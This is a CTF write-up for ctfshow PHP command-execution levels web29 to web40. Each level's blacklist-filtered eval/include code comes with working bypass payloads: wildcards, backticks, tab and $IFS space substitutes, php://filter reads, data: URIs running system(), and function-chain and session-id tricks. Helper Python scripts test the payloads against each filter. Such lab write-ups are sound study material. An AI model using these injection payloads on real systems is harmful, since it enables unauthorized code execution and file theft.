ctfshow command execution


WEB29


error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

Method 1: a shell wildcard, so the literal word "flag" never appears in c.
payload: ?c=system('cat f*');

Method 2: understand what eval() does. The string is run as PHP code, so a `?>` inside it leaves PHP mode and a later `<?php` re-enters it; whatever lies between the two is printed verbatim. First list the directory to confirm the file name:

?c=echo "npfs";?>ctf<?php system('ls');

The listing shows flag.php. Reading it with include and the php://filter wrapper returns the source base64-encoded instead of executing it, so the flag stored inside the file is not swallowed:

?c=echo "npfs";?>ctf<?php include($_GET['url']);&url=php://filter/read=convert.base64-encode/resource=flag.php

The preg_match only inspects c; the word flag in the url parameter is never checked.

WEB30

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

Solution one: system is filtered, but PHP's backtick operator runs a shell command and returns its output, so echo it:

payload: ?c=echo `cat f*`;
payload: ?c=echo `nl f*`;

Other commands that print a file like cat:

more, less, nl, tail (the full list is under web31)

Solution two: include plus the php://filter wrapper, with every filtered word moved into the url parameter, which preg_match never sees:

payload:
?c=echo "npfs";include($_GET['url']);?>&url=php://filter/read=convert.base64-encode/resource=flag.php

WEB31

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

This level filters flag, system, php, cat, sort, shell, the dot, the space and the single quote. The dot rules out typing flag.php (use the wildcard f*), the single quote rules out 'cat f*' (use backticks or double quotes), and the space has to be replaced.

When cat is filtered, the following commands print a file as well:

(1) more: display the file page by page
(2) less: like more, but can page in both directions
(3) head: show the first lines
(4) tac: print from the last line, i.e. cat in reverse
(5) tail: show the last lines
(6) nl: print the file with line numbers
(7) od: dump the file byte by byte (od -c shows the characters)
(8) vi: an editor, can also display the file
(9) vim: an editor, can also display the file
(10) sort: prints the lines, sorted (filtered at this level)
(11) uniq: prints the lines, collapsing adjacent duplicates
(12) file -f: treats the file as a list of names to examine; the error message for each name leaks that line
(13) sed: a stream editor; sed p (or sed '') prints the file

When the space is filtered, separate the command from its argument with one of:
%09 (a tab; the filter only blocks the literal space), $IFS$9 or ${IFS} (a bare $IFS followed by a letter would be read as a different variable name), < and <> (input redirection). %20 is decoded to a real space before preg_match runs, so it does not help.
payload:

?c=echo`nl%09f*`;

web32

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

On top of the previous level the backtick, echo, the semicolon and the opening parenthesis are filtered, so neither shell execution nor any function call is possible.

include is a language construct, not a function, so it needs no parentheses, and `?>` terminates the statement in place of the filtered semicolon. The file name is moved into a separate parameter that the filter never inspects, and the php://filter wrapper returns it base64-encoded.

payload (the file name is sent by POST; inside the double-quoted string PHP accepts the array key without quotes):

?c=include"$_POST[1]"?>
1=php://filter/read=convert.base64-encode/resource=flag.php

Passing it through GET gives the same result:

payload

?c=include$_GET["a"]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

The response is the base64 of flag.php; decoding it gives the flag.

flag:flag{cc9b544f-8f19-48b6-b867-b9837304f780}

WEB33

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

This level adds the double quote to the previous filter (the space was already filtered). Drop the quotes around the array key: an unquoted key is looked up as a constant and, being undefined, falls back to the string "_" with a warning that error_reporting(0) hides (on PHP 8 an undefined constant throws an Error instead). A tab (%09) separates include from the variable.
payload:

?c=include%09$_GET[_]?>&_=php://filter/read=convert.base64-encode/resource=flag.php

WEB34

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

The colon is filtered as well. It only occurs in php://filter, which lives in the unchecked _ parameter, so the previous payload still works unchanged.

WEB35

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

The `<` and `=` are filtered as well. Neither appears in c (the `=` of `&_=` is in the query string outside c, and `?>` contains only `>`), so the payload is the same:

?c=include%09$_GET[_]?>&_=php://filter/read=convert.base64-encode/resource=flag.php

WEB36

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

The slash and the digits 0 to 9 are filtered as well. Both only occur in the php://filter string, which sits in the _ parameter, so the same payload still works:

?c=include%09$_GET[_]?>&_=php://filter/read=convert.base64-encode/resource=flag.php
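The filters of web29 to web36 only ever inspect $_GET['c'], which is why every payload above smuggles flag.php and the php://filter wrapper through a second parameter. The Python below is an added example, not part of the original writeup: it reproduces each level's preg_match() with Python's re module, parses the query string the way $_GET does, and reports which of the payloads above survive which level. The payload strings, the query-string parser and the helper names are constructed here; Python's re stands in for PCRE, which is exact for these plain alternations of literals.

```python
import re
from urllib.parse import unquote_plus

# Constructed reproduction of the preg_match("/.../i") patterns from web29 to web36.
# Python's re and PCRE agree on plain alternations of literals like these.
FILTERS = {
    "web29": r"flag",
    "web30": r"flag|system|php",
    "web31": r"flag|system|php|cat|sort|shell|\.| |\'",
    "web32": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(",
    "web33": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"",
    "web34": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"",
    "web35": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=",
    "web36": r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]",
}

FILTER_URL = "php://filter/read=convert.base64-encode/resource=flag.php"

# The query strings from the writeup, as they appear after the '?' (constructed here).
PAYLOADS = {
    "web29": "c=system('cat f*');",
    "web30": "c=echo `cat f*`;",
    "web31": "c=echo`nl%09f*`;",
    "web32": 'c=include$_GET["a"]?>&a=' + FILTER_URL,
    "web33": "c=include%09$_GET[_]?>&_=" + FILTER_URL,
}


def php_preg_match(pattern, subject):
    """Approximates preg_match('/pattern/i', $subject): True when anything matches."""
    return re.search(pattern, subject, re.IGNORECASE) is not None


def get_params(query_string):
    """Mimics $_GET: split on '&', the first '=' separates key from value, then percent-decode."""
    params = {}
    for pair in query_string.split("&"):
        key, _, value = pair.partition("=")
        params[key] = unquote_plus(value)
    return params


def reaches_eval(level, query_string):
    """True when $_GET['c'] from this query string is handed to eval() at this level."""
    return not php_preg_match(FILTERS[level], get_params(query_string)["c"])


def surviving_levels(query_string):
    """Every level whose filter the payload passes, in challenge order."""
    return [level for level in FILTERS if reaches_eval(level, query_string)]


def blocked_by(level, subject):
    """The filter alternatives that fire on a string, lower-cased: what has to be replaced."""
    return sorted({m.group(0).lower() for m in re.finditer(FILTERS[level], subject, re.IGNORECASE)})


if __name__ == "__main__":
    for level, query in PAYLOADS.items():
        print(f"{level}: {query!r} passes {surviving_levels(query)}")
    # The wrapper string itself could never pass, so it must travel in a parameter the filter ignores.
    print("php://filter string is blocked at web36 by:", blocked_by("web36", FILTER_URL))
```

Run as a script it prints, per payload, the levels it would reach eval() on; the web33 payload passes all eight filters, while the php://filter string alone trips eight different alternatives of the web36 regex, which is exactly why it rides in the unchecked parameter.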

WEB37

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}

Here include() is applied to c directly, so a PHP stream wrapper (pseudo-protocol) can be passed. With the data: wrapper include() executes the text supplied in the URL as PHP; this needs allow_url_include=On, which the challenge has. Either quote style works inside the data: URI; the only word the filter blocks is flag, which the wildcard avoids.
payload:

?c=data:text/plain,<?php system("cat f*")?>

WEB38

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}

php and file are filtered as well, so neither the <?php tag nor the php://filter wrapper may appear in c. Base64-encode the stub inside the data: URI: preg_match only sees the encoded text, and the decoded bytes never pass through it.
payload:

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs/Pg==

The base64 decodes to <?php system("cat f*");?>. Check the encoded string itself for the filtered words before sending; a different stub can by chance encode to text that contains one.

web39

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
}else{
    highlight_file(__FILE__);
}

Here ".php" is appended to c before the include, and the same data: payload is used:

payload: ?c=data:text/plain,<?php system('cat f*')?>

What gets included is data:text/plain,<?php system('cat f*')?>.php. The PHP block runs, and because it is closed with ?> the trailing .php lies outside any PHP tag, so it is simply printed as text and the suffix does no harm.
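web37 to web39 switch from eval() to include(), so the question becomes what include() actually opens and executes. The Python below is an added example, not from the writeup: it builds the plain and base64 data: URIs for a stub, picks the form that survives each level's filter, recovers the bytes PHP's data: wrapper hands to include(), and splits them into the part PHP executes and the part it prints verbatim, which is why the appended .php of web39 is harmless. The stub, the filter patterns and the splitter are constructed here; the splitter only understands `<?php ... ?>` blocks.

```python
import base64
import re

# Constructed reproduction of the preg_match patterns of web37, web38 and web39.
FILTERS = {
    "web37": r"flag",
    "web38": r"flag|php|file",
    "web39": r"flag",
}

# Stub to execute; the wildcard keeps the word "flag" out of the request (constructed).
PHP_STUB = '<?php system("cat f*");?>'


def php_preg_match(pattern, subject):
    """Approximates preg_match('/pattern/i', $subject)."""
    return re.search(pattern, subject, re.IGNORECASE) is not None


def data_uri_plain(php):
    """data: URI carrying the stub in clear text."""
    return "data:text/plain," + php


def data_uri_base64(php):
    """data: URI carrying the stub base64-encoded, so 'php' never appears literally."""
    return "data://text/plain;base64," + base64.b64encode(php.encode()).decode()


def pick_payload(level, php=PHP_STUB):
    """First data: form whose c survives the level's filter, or None if neither does."""
    for candidate in (data_uri_plain(php), data_uri_base64(php)):
        if not php_preg_match(FILTERS[level], candidate):
            return candidate
    return None


def data_body(uri):
    """Bytes the data: wrapper gives include(): everything after the comma,
    base64-decoded when the media type ends in ';base64'."""
    header, _, body = uri.partition(",")
    if header.endswith(";base64"):
        return base64.b64decode(body).decode()
    return body


def php_segments(source):
    """Split an included file into ('code', ...) blocks PHP runs and ('text', ...) it prints as-is."""
    segments, pos = [], 0
    for m in re.finditer(r"<\?php\s(.*?)\?>", source, re.S):
        if m.start() > pos:
            segments.append(("text", source[pos:m.start()]))
        segments.append(("code", m.group(1).strip()))
        pos = m.end()
    if pos < len(source):
        segments.append(("text", source[pos:]))
    return segments


def included_segments(level, c):
    """What include($c . suffix) executes and prints; only web39 appends '.php'."""
    suffix = ".php" if level == "web39" else ""
    return php_segments(data_body(c + suffix))


if __name__ == "__main__":
    for level in FILTERS:
        c = pick_payload(level)
        print(level, "->", c)
        print("   include() sees:", included_segments(level, c))
```

For web38 the plain URI is rejected because of the literal "php", and the base64 form is chosen; for web39 the split shows one code block followed by the text ".php", which is what the page renders after the command output.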

web40


if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

Almost every digit and symbol is filtered. What remains usable is letters, the underscore, the semicolon and the ASCII parentheses, because the parentheses in the regex are the fullwidth characters （ and ）, not ( and ). With no quotes, no $ and no digits, the way in is a chain of parameterless functions: every argument is itself a call that takes no argument, and the file is read that way.
payload:

?c=show_source(next(array_reverse(scandir(current(localeconv())))));

How it works: localeconv() returns an array whose first element is the decimal point ".", current() takes it, scandir(".") lists the working directory in sorted order, array_reverse() turns the list around and next() steps to its second entry. With only flag.php and index.php in the directory that entry is flag.php, which show_source() prints.

A second route keeps the command out of c entirely and reads it from the session id:

?c=session_start();system(session_id());

with the request cookie PHPSESSID=ls. PHP only accepts a session id made of letters, digits, comma and minus; anything else is discarded and replaced by a fresh id, so a command containing a space or a dot cannot be passed this way.
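Two details of web40 are easy to get wrong when reading the filter: the parentheses it blocks are fullwidth, and the session-id trick only works for commands PHP accepts as a session id. The Python below is an added example, not from the writeup, that reproduces the web40 regex with the fullwidth characters, contrasts it with an ASCII-parenthesis version, and encodes PHP's session-id validation rule (letters, digits, comma, minus, at most 256 characters) as a check on candidate PHPSESSID values. The pattern strings and helper names are constructed here.

```python
import re

# Constructed reproduction of the web40 filter. The real regex contains the fullwidth
# parentheses U+FF08 and U+FF09, not ASCII ( and ); that is the whole trick of the level.
WEB40_FILTER = (r"[0-9]|\~|\`|\@|\#|\$|\%|\^|\&|\*|（|）|\-|\=|\+|\{|\[|\]|\}"
                r"|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\")

# The same regex as it would read with ASCII parentheses: the chain below would then be blocked.
ASCII_PAREN_FILTER = WEB40_FILTER.replace("（", r"\(").replace("）", r"\)")

# Parameterless chain from the writeup: every argument is itself a call without arguments.
PAYLOAD = "show_source(next(array_reverse(scandir(current(localeconv())))));"


def blocked_by(pattern, c):
    """Filter alternatives that fire on c; an empty list means c reaches eval()."""
    return sorted({m.group(0) for m in re.finditer(pattern, c, re.IGNORECASE)})


def reaches_eval(c, pattern=WEB40_FILTER):
    """True when preg_match() finds nothing and eval($c) runs."""
    return not blocked_by(pattern, c)


def valid_session_id(sid):
    """PHP (php_session_valid_key) keeps a PHPSESSID only if it is 1..256 chars of [A-Za-z0-9,-];
    otherwise session_start() drops it and session_id() returns a fresh random id."""
    return re.fullmatch(r"[A-Za-z0-9,-]{1,256}", sid) is not None


def session_id_command(cmd):
    """Cookie header for the session_id() trick, or None if PHP would reject the value."""
    return f"Cookie: PHPSESSID={cmd}" if valid_session_id(cmd) else None


if __name__ == "__main__":
    print("chain reaches eval:", reaches_eval(PAYLOAD))
    print("with ASCII parens it would be blocked by:", blocked_by(ASCII_PAREN_FILTER, PAYLOAD))
    for cmd in ("ls", "cat f*"):
        print(f"{cmd!r}: {session_id_command(cmd)}")
```

The session-id check is the practical caveat: `ls` fits the allowed alphabet, `cat f*` does not, so enumerating the directory works but reading flag.php needs the parameterless chain (or another encoding of the command into the allowed characters).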

Origin blog.csdn.net/qq_45951598/article/details/113716712